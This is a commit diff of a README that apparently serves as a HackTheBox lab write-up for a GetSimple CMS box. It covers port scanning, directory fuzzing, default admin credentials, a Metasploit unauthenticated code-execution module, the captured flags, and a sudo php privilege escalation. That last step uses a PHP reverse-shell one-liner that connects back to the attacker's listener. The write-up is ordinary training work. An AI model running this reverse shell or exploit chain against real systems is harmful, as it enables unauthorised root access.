~a14m/HTB

8eeec2a1595fbd9216f5131391a2ece60bea664f — a14m 4 months ago 69adea7
Update the readme
1 files changed, 15 insertions(+), 14 deletions(-)

M gettingstarted.htb/README.md
M gettingstarted.htb/README.md => gettingstarted.htb/README.md +15 -14
@@ 25,9 25,9 @@ Service detection performed. Please report any incorrect results at https://nmap
Nmap done: 1 IP address (1 host up) scanned in 8.79 seconds
```

## 80/tcp
GetSimple CMS
---

## Ports: (80/tcp) GetSimple CMS
### Directory fuzzing
`gobuster dir --url 10.129.168.121 --wordlist /usr/share/SecLists/Discovery/Web-Content/common.txt`



@@ 68,9 68,12 @@ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
#### Credentials

| username | password | note |
| -------- | -------- | ---- |
| admin    | admin    | http://10.129.168.121/admin |

### Metasploit
---

## Metasploit
```
> search getsimple



@@ 86,7 89,9 @@ Matching Modules
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/http/getsimplecms_unauth_code_exec
```

### Exploit
---

## Exploit
```
> use 1
> set rhosts 10.129.168.121 


@@ 102,20 107,16 @@ $ cat user.txt
> 7002d65b149b0a4d19132a66feed21d8
```

### Privilage escalation
## Privilage escalation
```
$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500                                                     │
        inet 10.10.15.130  netmask 255.255.254.0  destination 10.10.15.130

[parrotOS]$ nc -lnvp 9001
[box]$ nc -lnvp 9001

[box]$ sudo -l
[target]$ sudo -l
User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
[box]$ sudo php -r '$sock=fsockopen("10.10.15.130",9001);passthru("/bin/sh -i <&3 >&3 2>&3");'
[parrotOS]$ whoami
[target]$ sudo php -r '$sock=fsockopen("10.10.15.130",9001);passthru("/bin/sh -i <&3 >&3 2>&3");'
[box]$ whoami
> root
[parrotOS]$ cat /root/root.txt
[box]$ cat /root/root.txt
> f1fba6e9f71efb2630e6e34da6387842
```